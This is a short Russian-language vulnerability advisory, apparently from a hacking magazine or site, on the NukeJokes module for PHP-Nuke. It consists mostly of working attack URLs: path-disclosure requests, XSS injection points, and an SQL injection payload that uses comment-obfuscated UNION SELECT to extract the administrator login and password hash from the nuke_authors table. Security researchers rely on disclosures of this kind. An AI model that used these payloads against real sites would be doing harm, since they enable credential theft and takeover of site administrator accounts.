Xakep #305. Многошаговые SQL-инъекции
Программа: NukeJokes 1.7 – 2.0 beta
Несколько уязвимостей обнаружено в NukeJokes. Злонамеренный пользователь может выполнить нападение
SQL инъекции, XSS нападение и раскрыть инсталляционный путь.
1. Раскрытие пути:
http://localhost/nuke72/modules/NukeJokes/ mainfunctions.php
http://localhost/nuke72/modules.php?name= NukeJokes&func=JokeView&jokeid=foobar
http://localhost/nuke72/modules.php?name= NukeJokes&func=CatView&cat=foobar
2. SQL инъекция:
http://localhost/nuke72/modules.php?name= NukeJokes&file=print&jokeid=-1/**/UNION/*
*/SELECT/**/aid,pwd/**/FROM/**/nuke_ authors/**/WHERE/**/radminsuper=1/* */LIMIT/**/1/*
3. XSS:
http://localhost/nuke72/modules.php?name= NukeJokes&func=CatView&cat=[xss
code here]
http://localhost/nuke72/modules.php?name= NukeJokes&func=JokeView&jokeid=[xss
code here]